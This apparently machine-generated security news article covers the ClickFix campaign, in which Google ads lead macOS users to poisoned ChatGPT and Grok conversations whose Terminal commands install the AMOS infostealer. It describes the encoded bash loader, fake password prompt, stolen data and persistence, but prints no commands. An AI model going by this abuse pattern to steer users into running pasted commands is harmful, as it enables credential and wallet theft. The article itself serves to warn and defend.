Ethical Hacking News
A new attack campaign has been identified where hackers use legitimate AI platforms like ChatGPT and Grok to distribute a macOS-specific malware called AMOS, known as the ClickFix campaign. This uses Google search ads to lure victims into conversations that appear helpful but ultimately lead to installing the malware on affected systems. Users need to be vigilant about executing commands they find online without fully understanding their implications.
Hackers are using legitimate AI platforms like ChatGPT and Grok to distribute a macOS-specific malware called AMOS. The "ClickFix" attack campaign uses Google search ads to lure users into conversations that offer helpful instructions but lead to installing the malware. The malware is designed to target cryptocurrency wallets, browser data, macOS Keychain data, and files on the filesystem. AMOS operates under a malware-as-a-service (MaaS) model, renting the infostealer for $1,000 per month. The malware uses a LaunchDaemon to restart itself if terminated, ensuring persistence in the system. Users need to be vigilant and avoid executing commands they find online without fully understanding their implications.
A recent surge in malicious activity has been observed, where hackers are utilizing legitimate AI platforms like ChatGPT and Grok to distribute a macOS-specific malware called AMOS. This attack campaign, dubbed "ClickFix," leverages Google search ads to lure users into conversations that appear to offer helpful instructions but ultimately lead to installing the malware on affected systems.
The ClickFix attack begins with victims searching for terms related to macOS maintenance, problem-solving, or troubleshooting. Google advertisement links directly to these conversations, which are hosted on legitimate LLM platforms and contain the malicious instructions used to install the malware. Researchers at Kaspersky were among the first to spot this campaign, while a more detailed report was published by Huntress managed security platform.
Huntress researchers confirmed that the campaign is not an isolated incident but rather a deliberate, widespread poisoning campaign targeting common troubleshooting queries. They reproduced these poisoned results across multiple variations of the same question, such as "how to clear data on iMac" or "clear system data on iMac." This confirmation highlights the scope and sophistication of this attack.
If users fall for the trick and execute the commands from the AI chat in macOS Terminal, a base64-encoded URL decodes into a bash script that loads a fake password prompt dialog. The script, labeled as an update, is designed to trick users into entering sensitive information or executing malicious commands on their system.
The AMOS infostealer malware targets macOS systems exclusively and has been documented since April 2023. It operates under the business model of a malware-as-a-service (MaaS) operation, where it rents the infostealer for $1,000 per month. The malware is known to target cryptocurrency wallets from various providers, browser data such as cookies and saved passwords, macOS Keychain data, and files on the filesystem.
To further entrench itself within the victim's system, AMOS uses a LaunchDaemon (com.finder.helper.plist) running a hidden AppleScript that acts as a watchdog loop. This script restarts the malware within one second if terminated, ensuring persistence in the system.
The ClickFix campaign serves as yet another example of threat actors utilizing legitimate platforms to spread malicious content. Users need to be vigilant and avoid executing commands they find online without fully understanding their implications. Kaspersky noted that even after reaching manipulated LLM conversations, a simple follow-up question can reveal the safety of the instructions.
As users navigate the complex landscape of AI-powered tools and search engines, it's essential to remember that not all advice or prompts are created equal. Being cautious about where you find your answers can significantly reduce your risk exposure to this type of malicious activity.
Related Information:
https://www.ethicalhackingnews.com/articles/New-Attack-Campaign-Uses-Legitimate-AI-Platforms-to-Distribute-Mac-Malware-ehn.shtml
https://www.bleepingcomputer.com/news/security/google-ads-for-shared-chatgpt-grok-guides-push-macos-infostealer-malware/
https://malwaretips.com/threads/attackers-are-using-google-ads-that-appear-in-mac-troubleshooting-searches-to-lure-users-to-a-fake-chatgpt-chat-which-instructs-them-to-run-malware.138647/
https://www.huntress.com/blog/amos-stealer-chatgpt-grok-ai-trust
Published: Wed Dec 10 17:58:13 2025 by llama3.2 3B Q4_K_M
